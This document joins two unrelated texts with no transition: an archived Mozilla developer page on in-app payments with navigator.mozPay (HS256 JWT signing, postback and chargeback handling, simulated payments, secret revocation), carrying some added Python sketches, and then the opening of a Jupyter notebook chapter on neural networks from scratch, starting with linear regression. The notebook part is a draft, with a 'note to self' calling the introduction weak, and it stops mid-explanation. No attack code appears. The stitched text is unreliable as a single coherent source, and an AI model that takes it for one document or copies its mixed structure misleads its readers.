Here is an overview of each field:
In Python code (using PyJWT), you could sign and encode the request dictionary shown above like this:
import jwt

signed_request = jwt.encode(request_dict, application_secret, algorithm='HS256')
This code signs a JWT using the application secret and uses the HMAC SHA 256 algorithm. Currently, this is the only supported algorithm. When encoded, it will look something like this:
eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.IntcImF1ZFwiOiBcIm1hcmtldHBsYWNlLm1vemlsbGEub3JnXCIsIFwiaXNzXCI6IFwiQVBQLTEyM1wiLCBcInJlcXVlc3RcIjoge1wiY3VycmVuY3lcIjogXCJVU0RcIiwgXCJwcmljZVwiOiBcIjAuOTlcIiwgXCJuYW1lXCI6IFwiVmlydHVhbCAzRCBHbGFzc2VzXCIsIFwicHJvZHVjdGRhdGFcIjogXCJBQkMxMjNfREVGNDU2X0dISV83ODkuWFlaXCIsIFwiZGVzY3JpcHRpb25cIjogXCJWaXJ0dWFsIDNEIEdsYXNzZXNcIn0sIFwiZXhwXCI6IFwiMjAxMi0wMy0yMVQxMTowOTo1Ni43NTMxNDFcIiwgXCJpYXRcIjogXCIyMDEyLTAzLTIxVDEwOjA5OjU2LjgxMDQyMFwiLCBcInR5cFwiOiBcIm1vemlsbGEvcGF5bWVudHMvcGF5L3YxXCJ9Ig.vl4E31_5H3t5H_mM8XA69DqypCqdACVKFy3kXz9EmTI
The encoded/signed JWT can now be used by your app in its client code.
Set up a purchase button
Now that you have a backend to produce a JWT for your product, here's an example of writing frontend code with
navigator.mozPay. You would make a button somewhere in your app that lets players purchase the product. For example:
<button id="purchase">Purchase Magical Unicorn</button>
When the purchase button is clicked, your app should sign a JSON Web Token (JWT) and call navigator.mozPay. Here is an example using jQuery:
$('#purchase').click(function() {
  // The purchase is now pending...
  $.post('/sign-jwt', {})
    .done(function(signedJWT) {
      var request = navigator.mozPay([signedJWT]);
      request.onsuccess = function() {
        waitForPostback();
      };
      request.onerror = function() {
        console.log('navigator.mozPay() error: ' + this.error.name);
      };
    })
    .fail(function() {
      console.error('Ajax post to /sign-jwt failed');
    });
});

function waitForPostback() {
  // Poll your server until you receive a postback with a JWT.
  // If the JWT signature is valid then you can dispense the Magical Unicorn
  // product to your customer.
  // For bonus points, use Web Sockets :)
}
This code would make an Ajax request to a /sign-jwt URL on your own server. That URL would sign a JSON blob with product/price info and return a JWT in plain text. The Ajax handler would pass that JWT into navigator.mozPay and then wait until the Payment Provider POSTs a purchase confirmation to your server. If the signature on the posted JWT is valid you can deliver the virtual goods to your customer.
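To make the server side concrete, here is an illustrative sketch of what a /sign-jwt handler could compute with only the standard library (the helper names and claim values are my own, not from the Web Payment API spec):

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    # JWTs use unpadded URL-safe base64
    return base64.urlsafe_b64encode(data).rstrip(b'=')

def make_payment_jwt(claims, app_secret):
    """Sign a payment-request dict as an HS256 JWT (illustrative sketch)."""
    header = b64url(json.dumps({'alg': 'HS256', 'typ': 'JWT'}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + b'.' + payload
    sig = hmac.new(app_secret.encode(), signing_input, hashlib.sha256).digest()
    return (signing_input + b'.' + b64url(sig)).decode()

token = make_payment_jwt({'iss': 'APP-123', 'typ': 'mozilla/payments/pay/v1'},
                         'my-app-secret')
print(token.count('.'))  # prints 2: a JWT is three dot-separated parts
```

The resulting string is what the jQuery handler above would receive from /sign-jwt and pass to navigator.mozPay.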
Processing postbacks on the server
Before delivering your product, you need to wait for a purchase confirmation from the Marketplace; this is called a postback. The marketplace.firefox.com site sends a POST confirmation notice (a JWT) to the request.postbackURL specified in the original payment request. The postbackURL must be the URL for a server listening on either port 80 or port 443.
The POST has a Content-Type of application/x-www-form-urlencoded and the JWT can be found in the notice parameter. In your server framework you'll probably access this with something like request.POST['notice'].
This JWT notice contains all the payment request fields plus a transaction ID, and is signed with your application secret that was obtained from the Firefox Marketplace Developer Hub. You can fulfill the purchase when you receive a postback and validate the signature. If you get a JWT whose signature you cannot verify you should ignore it since it probably wasn't sent by the marketplace.
The Web Payment API spec explains what postbacks look like in detail. The postback contains the original request and adds a new response parameter that contains a Mozilla specific transaction ID. Here is an example:
{
  "iss": "marketplace.firefox.com",
  "aud": APPLICATION_KEY,
  "typ": "mozilla/payments/pay/post",
  "request": { ...the original request fields... },
  "response": {
    "transactionID": "ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9",
    "price": {"amount": "0.99", "currency": "CAD"}
  }
}
Description of the postback object:
Here are some important notes about the postback:
- The JWT is signed with your Application Secret
- Your postback/chargeback URLs must be located either on port 80 or port 443 of your web server. No other ports can be used. This is due to how Mozilla's firewall is configured.
Responding to postbacks
Your application must respond to the postback with a plain text HTTP response including just the transaction ID. For example:
HTTP/1.1 200 OK
Content-Type: text/plain

ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9
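As a sketch of the signature check (function names are mine; a real handler should also validate typ, iss, aud, and exp), the posted notice can be verified with the standard library before echoing the transaction ID back:

```python
import base64
import hashlib
import hmac
import json

def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + '=' * (-len(part) % 4))

def verify_notice(notice, app_secret):
    """Return the JWT payload dict if the HS256 signature checks out, else None."""
    try:
        header, payload, sig = notice.split('.')
    except ValueError:
        return None
    expected = hmac.new(app_secret.encode(),
                        (header + '.' + payload).encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(payload))

def postback_response(notice, app_secret):
    """Body of the plain-text response: the transaction ID, or None if invalid."""
    data = verify_notice(notice, app_secret)
    if data is None:
        return None
    return data['response']['transactionID']
```

A notice whose signature cannot be verified should simply be ignored, as the article advises.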
Processing chargebacks on the server
Marketplace will send you a chargeback notice (a POSTed JWT) if something goes wrong while processing the transaction, such as insufficient funds in the buyer's account. Chargebacks will be delivered to the app just like postbacks but they might arrive later on. The POST has a Content-Type of application/x-www-form-urlencoded and the JWT can be found in the notice parameter. The chargeback URL must be the URL for a server listening on either port 80 or port 443.
Here is an example of what a decoded chargeback notice might look like:
{
  "iss": "marketplace.firefox.com",
  "aud": APPLICATION_KEY,
  "typ": "mozilla/payments/pay/charge",
  "request": { ...the original request fields... },
  "response": {
    "transactionID": "ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9",
    "reason": "refund"
  }
}
Description of the chargeback object:
NOTE: Refunds are not yet supported for in-app payments.
Your application must respond to the chargeback with a plain text HTTP response containing just the transaction ID. For example:
HTTP/1.1 200 OK
Content-Type: text/plain

ABCD84294ec6-7352-4dc7-90fd-3d3dd36377e9
Postback/chargeback errors
If an application server responds to the HTTP request with a non-successful status code then Mozilla's Web Payment Provider will retry the URL several times. If it still doesn't receive a successful response, the app developer will be notified and the app may be temporarily disabled. If the application server does not respond to the postback or chargeback with the transaction ID then it is handled like an error and will be retried, etc. If you are not seeing requests to your chargeback or postback URLs, make sure that your server is listening on port 80 or 443. Mozilla's IAP server will not contact you otherwise.
Use HTTPS postback/chargeback URLs
When running your app in a production environment try to use secure HTTPS URLs if you have the means to do so. This will protect the postback data from being read by a third party when it transits from a Mozilla server to your app server. Using HTTPS is not mandatory to protect the integrity of the payment request, a JWT signature accomplishes that.
Warning: If you do not use secure HTTPS postback URLs, ensure your payment request does not contain personally identifiable information in case it is intercepted by a third party. For example, make sure your productData value does not reveal any sensitive user data. Mozilla never includes personally identifiable information in a payment request by default.
Postback/chargeback IPs
If you are correctly checking the JWT signature as decribed above then there is no need to whitelist IPs of the Firefox Marketplace servers that will send you postback/chargeback notices. However, if you wish to add an extra layer of protection (e.g. against key theft), the Marketplace will send you postback/chargeback notices from the following IP address(es). Any changes to these IP addresses will be announced on the dev-marketplace mailing list.
63.245.216.100
Simulating payments
The intro mentioned how you can obtain a special application key and application secret from the Firefox Marketplace Developer Hub to simulate in-app payments while you are developing and testing your app. Use this secret to sign a custom JWT that looks like this:
{
  "iss": APPLICATION_KEY,
  "aud": "marketplace.firefox.com",
  "typ": "mozilla/payments/pay/v1",
  "request": {
    ...,
    "simulate": {
      "result": "postback"
    }
  }
}
The additional request.simulate attribute tells the payment provider to simulate some result without charging any money. The user interface will not ask for a login or a PIN number either. You can use this while developing your app to make sure your buy button is hooked up correctly to navigator.mozPay and your server postback and chargeback URLs are functioning correctly.
Here is an example that will simulate a successful purchase and send a signed notification to your postback URL:
{
  ...
  "request": {
    ...
    "simulate": {
      "result": "postback"
    }
  }
}
Here is how to simulate a chargeback refund:
{
  ...
  "request": {
    ...
    "simulate": {
      "result": "chargeback",
      "reason": "refund"
    }
  }
}
A JWT notice is posted to your handler just like for a real purchase except you'll receive a randomly generated transactionID. It is okay to use non-HTTPS URLs for simulations.
When you simulate a chargeback, keep in mind that the mozPay onsuccess() callback will be invoked since a chargeback is not an operational error.
Note: Simulated payment JWTs should not be used in production because your customers would be able to obtain free products.
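Since the two simulation payloads differ only in the simulate object, a small helper can assemble them; every field outside simulate below is an illustrative placeholder, not a required name:

```python
def simulate_request(app_key, result, reason=None):
    """Build the claims dict for a simulated payment.

    Only the 'simulate' object is specified by the article; the other
    fields here are illustrative placeholders.
    """
    simulate = {'result': result}
    if reason is not None:
        simulate['reason'] = reason
    return {
        'iss': app_key,                   # your simulation Application Key
        'typ': 'mozilla/payments/pay/v1',
        'request': {
            'name': 'Magical Unicorn',    # illustrative product field
            'simulate': simulate,
        },
    }

print(simulate_request('APP-123', 'chargeback', 'refund')['request']['simulate'])
# prints: {'result': 'chargeback', 'reason': 'refund'}
```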
Debugging errors
If you don't use the in-app payment API correctly, the payment screen will show an error that aims to help the user figure out what to do. The payment screen will also include an error code which aims to help you as the developer figure out what to do. You can use Mozilla's Error Legend API to decipher error codes in your own language. For example, the error code INVALID_JWT means the JWT signature is invalid or the JWT is malformed.
Protect the application secret
Warning: Ensure that no one else can read your Application Secret. Never expose it to the client.
Revoking a compromised application secret
In the rare chance that your application secret leaks out or becomes compromised, you need to revoke it as soon as possible. Here's how:
- Log in to the Firefox Marketplace.
- Navigate to My Submissions and locate your app.
- Navigate to the Manage In-App Payments page, which is the same place where you generated your credentials.
- Click the Reset Credentials button.
After resetting your credentials, no one will be able to process payments with the old credentials. You will see a new application key and application secret that you can begin using immediately to continue processing payments in your app.
If you need to report any other security issues, please file a bug in the Payments/Refunds component.
Code libraries
Here are libraries specific to Mozilla's navigator.mozPay:
To find a secure, up to date JSON Web Token (JWT) library for your favorite language, see jwt.io.
Sample code
- Here is the source to Web Fighter, a game that implements in-app payments in NodeJS. You can install it from the Marketplace here.
- Here is a diagnostics and testing app that shows how to sign JWT requests and write postback and chargeback verifier code in Python: In-app Payment Tester
Getting help
- You can discuss in-app payment related issues on the dev-webapps mailing list or in the #payments channel on irc.mozilla.org.
- You can file a Marketplace bug in the Payments/Refunds component if you find a bug | https://developer.mozilla.org/en-US/docs/Archive/Marketplace/Monetization/In-app_payments_section/mozPay_iap | CC-MAIN-2021-17 | refinedweb | 2,284 | 54.73 |
Classes and Objects in C++
Reading time: 45 minutes | Coding time: 5 minutes
The main purpose of C++ programming is to add object orientation to the C programming language, and classes are the central feature of C++ that supports object-oriented programming. They are often called
A class is a mechanism for creating user-defined data types. It is similar to the C language structure data type. In C, a structure is composed of a set of data members. In C++, a class type is like a C structure, except that a class is composed of a set of data members and a set of operations that can be performed on the class.
In other words, these are the building block of C++ that leads to Object Oriented programming.It is a user defined data type, which holds its own data members and member functions, which can be accessed and used by creating an instance of that class. A class is like a
blueprint for an object.
A class is used to specify the form of an object and it combines data representation and methods for manipulating that data into one neat package. The data and functions within a class are called members of the class.That means, the variables inside class definition are called as data members and the functions are called member functions.
All in all, it can also be said that a class is a way to bind the data and its associated functions together in a single unit. This process is called Encapsulation.
Example-1:

That means, a Class is just a blueprint, which declares and defines characteristics and behavior, namely data members and member functions respectively. All objects of this class will share these characteristics and behavior.

Example-2: Consider the class of Cars.

Here, the data members will be speed limit, mileage etc and member functions can be apply brakes, increase speed etc.
C++ Class
When we define a class, we define a blueprint for a data type. For example:

class Student {
public:
    int id;        // field or data member
    float salary;  // field or data member
    string name;   // field or data member
};
In the above example, the keyword public determines the access attributes of the members of the class that follows it. A public member can be accessed from outside the class anywhere within the scope of the class object. We can also specify the members of a class as private or protected.
C++ Objects
An Object is an
instance of a Class. When a class is defined, no memory is allocated but when it is instantiated (i.e. an object is created) memory is allocated.
Objects are instances of class, which holds the data variables declared in class and the member functions work on these class objects.
Each object has its own data variables. Objects are initialised using special class functions called Constructors. And whenever an object goes out of scope, another special class member function called the Destructor is called to release the memory reserved by the object. C++ doesn't have an automatic garbage collector like Java; in C++ the Destructor performs this task.
In C++, a class is a group of similar objects. It is a template from which objects are created. It can have fields, methods, constructors etc.
We declare objects of a class with exactly the same sort of declaration that we declare variables of basic types. The following statements declare two objects of class Box −
Box Box1; // Declare Box1 of type Box Box Box2; // Declare Box2 of type Box
Both of the objects Box1 and Box2 will have their own copy of data members.
Syntax :
ClassName ObjectName;
Accessing data members and member functions :
The data members and member functions of a class can be accessed using the dot ('.') operator with the object.
1. Accessing data members :-
Example-1 : if the name of object is obj and you want to access the member function with the name printName() then you will have to write obj.printName().
Let's now understand this through code:
Example-2:
#include <iostream>

using namespace std;

class Box {
public:
    double length;   // Length of a box
    double breadth;  // Breadth of a box
    double height;   // Height of a box
};

int main() {
    Box Box1;  // Declare Box1 of type Box
    Box Box2;  // Declare Box2 of type Box
    double volume = 0.0;  // Store the volume of a box here

    // box 1 specification
    Box1.height = 5.0;
    Box1.length = 6.0;
    Box1.breadth = 7.0;

    // box 2 specification
    Box2.height = 10.0;
    Box2.length = 12.0;
    Box2.breadth = 13.0;

    // volume of box 1
    volume = Box1.height * Box1.length * Box1.breadth;
    cout << "Volume of Box1 : " << volume << endl;

    // volume of box 2
    volume = Box2.height * Box2.length * Box2.breadth;
    cout << "Volume of Box2 : " << volume << endl;
    return 0;
}
Output :
The output of the above Example-2 is as follows:

Volume of Box1 : 210
Volume of Box2 : 1560
NOTE :- Private and Protected members can not be accessed directly using direct member access operator (.).
Example-3: Initialize and Display data through method
#include <iostream>
using namespace std;

class Employee {
public:
    int id;        // data member (also instance variable)
    string name;   // data member (also instance variable)
    float salary;  // data member (also instance variable)

    void insert(int i, string n, float s) {
        id = i;
        name = n;
        salary = s;
    }
    void display() {
        cout << id << " " << name << " " << salary << endl;
    }
};

int main(void) {
    Employee e1;  // creating an object of Employee
    Employee e2;  // creating an object of Employee
    e1.insert(201, "Sonoo", 990000);
    e2.insert(202, "Nakul", 29000);
    e1.display();
    e2.display();
    return 0;
}
Output :
201 Sonoo 990000
202 Nakul 29000
2. Member functions :-
There are 2 ways to define a member function:
- Inside class definition
- Outside class definition
Defining a member function within the class definition declares the function inline, even if we do not use the inline specifier.
If the member function is defined inside the class definition it can be defined directly, but if it is defined outside the class, then we have to use the scope resolution :: operator along with the class name and the function name.
1. Inside class definition :
If we define the function inside the class then we do not need to declare it first; we can directly define the function.
Example -
#include <iostream>
using namespace std;

class Cube {
public:
    int side = 10;
    void getVolume() {
        cout << side * side * side;  // prints volume of cube
    }
};

int main() {
    Cube obj;
    obj.getVolume();
    return 0;
}
Output :-
1000
2. Outside class definition :
But if we plan to define the member function outside the class definition then we must declare the function inside class definition and then define it outside.
Example -
#include <iostream>
using namespace std;

class Cube {
public:
    int side = 10;
    void getVolume();
};

// member function defined outside the class definition
void Cube::getVolume() {
    cout << side * side * side;
}

int main() {
    Cube obj;
    obj.getVolume();
    return 0;
}
Output :-
1000
NOTE :- The main function for both function definitions will be the same. Inside main() we will create an object of the class, and will call the member function using the dot (.) operator.
Calling Class Member Function in C++
#include <iostream>

using namespace std;

class Box {
public:
    double length;   // Length of a box
    double breadth;  // Breadth of a box
    double height;   // Height of a box

    double getVolume(void) {
        return length * breadth * height;
    }
};

int main() {
    Box Box1;  // Declare Box1 of type Box
    Box Box2;  // Declare Box2 of type Box
    double volume = 0.0;  // Store the volume of a box here

    // box 1 specification
    Box1.height = 5.0;
    Box1.length = 6.0;
    Box1.breadth = 7.0;

    // box 2 specification
    Box2.height = 10.0;
    Box2.length = 12.0;
    Box2.breadth = 13.0;

    // volume of box 1
    volume = Box1.getVolume();
    cout << "Volume of Box1 : " << volume << endl;

    // volume of box 2
    volume = Box2.getVolume();
    cout << "Volume of Box2 : " << volume << endl;
    return 0;
}
Output :-
Volume of Box1 : 210
Volume of Box2 : 1560
Note :- Declaring a friend function is a way to give private access to a non-member function.
Types of Member Functions :-
- Simple functions
- Static functions
- Const functions
- Inline functions
- Friend functions
1. Simple Member functions :-
These are the basic member functions, which don't have any special keyword like static as prefix. All the general member functions, which are of the below given form, are termed as simple and basic member functions.
Syntax :
return_type functionName(parameter_list) { function body; }
2. Static Member functions :-.
These functions cannot access ordinary data members and member functions; only static data members and static member functions can be called inside them.

A static member function doesn't have a "this" pointer, which is why it cannot access ordinary members. It can be called using an object and the direct member access . operator, but it's more typical to call a static member function by itself, using the class name and the scope resolution :: operator.
example :-
class X {
public:
    static void f() {
        // statement
    }
};

int main() {
    X::f();  // calling member function directly with class name
}
3. Const Member functions :-
The const keyword makes variables constant: once defined, their values can't be changed. When used with a member function, such member functions can never modify the object or its data members.
Syntax :-
void fun() const {
    // statement
}
Example -
#include <iostream>
using namespace std;

class Demo {
    int x;
public:
    Demo(int i) {
        x = i;
    }
    int getValue() const {
        // x = 100;  // error: a const member function cannot modify data members
        return x;
    }
};

int main() {
    Demo d(10);
    cout << d.getValue();
    return 0;
}
4. Inline functions :-
All the member functions defined inside the class definition are by default declared as inline.
Example -
#include <iostream>
using namespace std;

inline int Add(int x, int y) {
    return x + y;
}

int main() {
    cout << "\n\tThe Sum is : " << Add(10, 20);
    cout << "\n\tThe Sum is : " << Add(45, 83);
    cout << "\n\tThe Sum is : " << Add(27, 48);
    return 0;
}
Output :
The Sum is : 30
The Sum is : 98
The Sum is : 75
Important Points About Inline Functions :-
- We must keep inline functions small, small inline functions have better efficiency.
- Inline functions do increase efficiency, but we should not make all the functions inline. Because if we make large functions inline, it may lead to code bloat, and might affect the speed too.
- Hence, it is advised to define large functions outside the class definition using the scope resolution :: operator, because if we define such functions inside the class definition, then they become inline automatically.
- Inline functions are kept in the Symbol Table by the compiler, and all the call for such functions is taken care at compile time.
5. Friend functions :-
Friend functions are actually not class member functions. They exist to give private access to non-class functions. We can declare a global function as a friend, or a member function of another class as a friend.

When we make a class a friend, all its member functions automatically become friend functions.

Friend functions are one reason why C++ is not called a pure object-oriented language, because they violate the concept of encapsulation.
Syntax:-
class class_name { friend data_type function_name(argument/s); };-1:
Example when the function is friendly to two classes :-
#include <iostream> class B; // forward declarartion. class A { int x; public: void setdata(int i) { x=i; } friend void min(A,B); // friend function. }; class B { int y; public: void setdata(int i) { y=i; } friend void min(A,B); // friend function }; void min(A a,B b) { if(a.x <= b.y) std::cout << a.x<< std::endl; else std::cout<< b.y<< std::endl; } int main() { A a; B b; a.setdata(10); b.setdata(20); min(a,b); return 0; }
Output :-
10 | https://iq.opengenus.org/classes-objects-cpp/ | CC-MAIN-2021-43 | refinedweb | 1,617 | 60.95 |
Miklos Szeredi <miklos@szeredi.hu> writes:> On Sat, Feb 15, 2014 at 01:37:26PM -0800, Eric W. Biederman wrote:>> >> v2: Always drop the lock when exiting early.>> v3: Make detach_mounts robust about freeing several>> mounts on the same mountpoint at one time, and remove>> the unneeded mnt_list list test.>> v4: Document the purpose of detach_mounts and why new_mountpoint is>> safe to call.>> >> Signed-off-by: Eric W. Biederman <ebiederman@twitter.com>>> --->> fs/mount.h | 2 ++>> fs/namespace.c | 39 +++++++++++++++++++++++++++++++++++++++>> 2 files changed, 41 insertions(+), 0 deletions(-)>> >> diff --git a/fs/mount.h b/fs/mount.h>> index 50a72d46e7a6..2b470f34e665 100644>> --- a/fs/mount.h>> +++ b/fs/mount.h>> @@ -84,6 +84,8 @@ extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);>> >> extern bool legitimize_mnt(struct vfsmount *, unsigned);>> >> +extern void detach_mounts(struct dentry *dentry);>> +>> static inline void get_mnt_ns(struct mnt_namespace *ns)>> {>> atomic_inc(&ns->count);>> diff --git a/fs/namespace.c b/fs/namespace.c>> index 33db9e95bd5c..7abbf722ce18 100644>> --- a/fs/namespace.c>> +++ b/fs/namespace.c>> @@ -1359,6 +1359,45 @@ static int do_umount(struct mount *mnt, int flags)>> return retval;>> }>> >> +/*>> + * detach_mounts - lazily unmount all mounts on the specified dentry>> + *>> + * During unlink, rmdir, and d_drop it is possible to loose the path>> + * to an existing mountpoint, and wind up leaking the mount.>> + * detach_mounts allows lazily unmounting those mounts instead of>> + * leaking them.>> + * >> + * The caller may hold dentry->d_inode->i_mutex.>> + */>> +void detach_mounts(struct dentry *dentry)>> +{>> + struct mountpoint *mp;>> + struct mount *mnt;>> +>> + namespace_lock();>> + if (!d_mountpoint(dentry))>> + goto out_unlock;>> +>> + /* >> + * The namespace lock and d_mountpoint being set guarantees>> + * that new_mountpoint will just be a lookup of the existing>> + * mountpoint structure.>> + */>> + mp = 
new_mountpoint(dentry);>> Howabout a get_mountpoint(dentry) helper, that returns NULL if it turns out to> be not a mountpoint? And, as an added bonus, you can drop the comment above as> well.I hate to admit it but that is a nice change. Especially as it allowsremoving the d_mounpoint check inside of namespace_lock. I still need acheak d_mounpoint check outside of namespace lock but inside it can go.The first time I looked at doing that I missed something and the changelooked too awkward to be worth implementing :(Eric | https://lkml.org/lkml/2014/2/24/761 | CC-MAIN-2020-16 | refinedweb | 354 | 58.89 |
Created on 2008-07-18 12:52 by gpolo, last changed 2018-05-29 14:18 by mkiever.
Follows a patch that adds support for the new data option supported
event generate. It allows virtual events to pass a tcl object.
This patch is only intended to correctly support tcl objects, trying to
pass other objects (like a dict) will result in None being returned. If
you want to correctly pass and receive a dict, make it an attribute of
the tcl object being passed.
E.g.:
import Tkinter
def handle_it(event):
print event.data.something
root = Tkinter.Tk()
root.something = {1: 2}
root.after(1, lambda: root.event_generate('<<Test>>', data=root))
root.bind('<<Test>>', handle_it)
root.mainloop()
Actually, it could be the "detail" field too according to
And this field may not exist, so I'm checking for that now.
New patch added.
Hello,
I read the proposed patch "event_generate__data2.diff" and the Tcl/Tk manual
* Could you please also add a field "e.user_data" ? This would simply be a copy of 'd' :
---
e.detail = d
e.user_data = d
---
My reasoning is that the Tcl/Tk manual mentions the two names "detail" and "user_data". However, "user_data" may often be preferred because it has a clear meaning, whereas "detail" is quite vague.
* I did not understand why you try to get a widget reference from the "%d" field. Is it supposed to contain a widget name at some point ? According to the manual (and if I understood it well), it should never.
Best regards,
O.C.
According to the Tcl/Tk docs the 'data' field is a string (i.e., for any user data) and the 'detail' field contains some internal data (so shouldn't be messed with); see
Anyway, I hope you add a data field for user created virtual events.
I don't agree with this comment.
1) The 'detail' field also contains a string, one of the following: "NotifyAncestor", "NotifyNonlinearVirtual",...
2) When an event is received, the 'detail' and 'user_data' fields are de facto mixed up. Indeed, the "%d" field contains "the detail or user_data field from the event".
This information comes form the documentation I cited, :
* The "%d" field contains "the detail or user_data field from the event".
* They are both strings:
* "the %d is replaced by a string identifying the detail"
* "For virtual events, the string will be whatever value is stored in the user_data field when the event was created (typically with event generate), or the empty string if the field is NULL"
From the document cited in msg165234 (), my understanding is:
* For virtual events, the "data" string parameter given to "event generate" will be stored in the "user_data field" for the event. This string will then be available from the event through the "%d" substitution.
* For events "Enter", "Leave", "FocusIn" and "FocusOut", the "detail" field will store a string among "NotifyAncestor", etc. This string will then be available from the event through the "%d" substitution.
So, from the point of view of the guy who receives the event, the "%d" field can EITHER be a "detail" string like "NotifyAncestor" if event was "Enter"/"Leave"/"FocusIn"/"FocusOut" OR a "user_data" string in the case of a virtual event. It seems sensible that the Python interface provides both names. As a consequence, I think the patch should read:
+ # value passed to the data option is not a widget, take it
+ # as the detail field
+ e.data = None
+ e.detail = d
+ e.user_data = d
I hope I understood the doc correctly.
I have a patched Python 3.5.3 running mostly following
the comments by O.C. If no one else is active on this
I can try to prepare something for submission.
Fill free to create a pull request. It may need tests and documentation though.
So I pulled, but it seems the CLA is stuck somewhere. Investigating... | https://bugs.python.org/issue3405 | CC-MAIN-2019-30 | refinedweb | 643 | 66.64 |
Do you hate those lengthy class definitions with
__init__ and too many whitespaces and newlines? Python One-Liners to the rescue! Luckily, you can create classes in a single line—and it can even be Pythonic to do so! Sounds too good to be true? Let’s dive right into it!
Problem: How to create a Python class in a single line of code?
Example: Say, you want to create a class
Car with two attributes
speed and
color. Here would be the lengthy definition:
class Car: def __init__(self, speed, color): self.speed = speed self.color = color porsche = Car(200, 'red') tesla = Car(220, 'silver') print(porsche.color) # red print(tesla.color) # silver
How do you do this in a single line of code?
Let’s have an overview first in our interactive Python shell:
Exercise: Create a third attribute
seats and initialize it for both the Tesla and the Porsche car!
Method 1: type()
The
type(name, bases, dict) function creates and returns a new object. It takes three arguments that allow you to customize the object:
name: this is the class name of the new object. It becomes the
nameattribute, so that you can use
object.nameto access the argument value.
bases: this is a tuple of one or more tuple values that defines the base classes. You can access the content via the
object.basesattribute of the newly-created object.
dict: this is the namespace with class attributes and methods definitions. You can create custom attributes and methods here. In case, you want to access the values later, you can use the
object.__dict__attribute on the newly-created object.
Here’s how you can use the
type() function to create a new
Car object
porsche:
# Method 1: type() # One-Liner porsche = type('Car', (object,), {'speed': 200, 'color': 'red'}) # Result print(porsche.color) # red
If you need to learn more about the
type() function, check out our related article.
Related Article: How to Create Inline Objects With Properties? [Python One-Liner]
The
type() function is little-known but very effective when it comes to creating object of various types. The only disadvantage is that you cannot reuse it—for example, to create another object. You’d need to use the same argument list to create a second object of the same type, which may be a bit tedious in some cases.
Method 2: Lambda Object + Dynamic Attributes
The
lambda keyword is usually used to create a new and anonymous function. However, in Python, everything is an object—even functions. Thus, you can create a function with return value
None and use it as a
Car object.
Then, you add two dynamic attributes
speed and
color to the newly created object. You can one-linerize everything by using the semicolon syntax to cram multiple lines of code into a single line. Here’s how the result looks like:
# Method 2: lambda + dynamic attributes # One-Liner tesla = lambda: None; tesla.speed = 200; tesla.color = 'silver' # Result print(tesla.color) # silver
This method is a bit unnatural—and I’d consider it the least-Pythonic among the ones discussed in this article. However, the next one is quite Pythonic!
Method 3: Named Tuples
There also is an exciting data type in the collections module: named tuples.
from collections import namedtuple # One-Liner tesla = namedtuple('Car', ['speed', 'color'])(200, 'silver') # Result print(tesla.speed, tesla.color) # 200 silver
The namedtuple object definition consists of two parts:
- The first part of the expression
namedtuple('Car', ['speed', 'color'])creates a new object with two attributes given in the list.
- The second part of the expression associates the string
'value'to the tuple attribute
'property'.
This final method is efficient, clean, and concise—and it solves the problem to create a Python class in a single line of code because you can reuse your namedtuple “class” to create multiple instances if you want!!! | https://blog.finxter.com/python-one-line-class/ | CC-MAIN-2020-50 | refinedweb | 649 | 66.44 |
CodePlexProject Hosting for Open Source Software
Hello,
I have been recently testing the Bson Serialization / Deserialization side of your library and have hit something that is causing me a bit of grief. I am sure I have overlooked something, but I am at an impasse and thought I would reach out to
you. I have included a small amount test code below. The primary problem is that when I set the object in the class to an Int32, serialize to a memorystream, then deserialize from the memorystream I end up with the object set to a long, but
with the correct value. I have verified that the value is being read from the stream correctly in the BsonReader.ReadType method as an Integer, yet the object in the deserialized class ends up being a long. Another place you can see something odd
happening is if you set the object to a class object. The object serializes out of the byte array as a Newtonsoft.Json.Linq.JObject instead of the actual class. Do you have any suggestions?
Thank you
simple class:
[Serializable]
public class Test1
{
public int TestVal1 { get; set; }
public object TestVal2 { get; set; }
}
simple console app:
class Program
{
static void Main(string[] args)
{
Test1 t1 = new Test1();
t1.TestVal1 = 12;
t1.TestVal2 = (int)13;
JsonSerializer Js = new JsonSerializer();
MemoryStream Ms = new MemoryStream();
BsonWriter Bw = new BsonWriter(Ms);
Js = new JsonSerializer();
Js.Serialize(Bw, t1);
Bw.Flush();
Ms.Position = 0;
BsonReader Br = new BsonReader(Ms);
Test1 xx = Js.Deserialize<Test1>(Br);
Console.ReadLine();
}
}
Watch window from debug:
- t1 {BsonTest3.Test1} BsonTest3.Test1
TestVal1 12 int
TestVal2 13 object {int}
- xx {BsonTest3.Test1} BsonTest3.Test1
TestVal1 12 int
TestVal2 13 object {long}
Are you sure you want to delete this post? You will not be able to recover it later.
Are you sure you want to delete this thread? You will not be able to recover it later. | https://json.codeplex.com/discussions/268793 | CC-MAIN-2017-09 | refinedweb | 318 | 57.16 |
%load_ext autoreload %autoreload 2 %matplotlib inline %config InlineBackend.figure_format = 'retina'
Neural Networks from Scratch
In this chapter, we are going to explore differential computing in the place where it was most highly leveraged: the training of neural networks. Now, as with all topics, to learn something most clearly, it pays to have an anchoring example that we start with.
In this section, we'll lean heavily on linear regression as that anchoring example. We'll also explore what gradient-based optimization is, see an elementary example of that in action, and then connect those ideas back to optimization of a linear model. Once we're done there, then we'll see the exact same ideas in action with a logistic regression model, before finally seeing them in action again with a neural network model.
The big takeaway from this chapter is that basically all supervised learning tasks can be broken into:
- model
- loss
- optimizer
Hope you enjoy it! If you're ready, let's take a look at linear regression.
import jax.numpy as np from jax import jit import numpy.random as npr import matplotlib.pyplot as plt from ipywidgets import interact, FloatSlider from pyprojroot import here
Linear Regression
Linear regression is foundational to deep learning. It should be a model that everybody has been exposed to before in school.
A humorous take I have heard about linear models is that if you zoom in enough into whatever system of the world you're modelling, anything can basically look linear.
One of the advantages of linear models is its simplicity. It basically has two parameters, one explaining a "baseline" (intercept) and the other explaining strength of relationships (slope).
Yet one of the disadvantages of linear models is also its simplicity. A linear model has a strong presumption of linearity.
NOTE TO SELF: I need to rewrite this introduction. It is weak.
Equation Form
Linear regression, as a model, is expressed as follows:
Here:
- The model is the equation, y = wx + b.
- y is the output data.
- x is our input data.
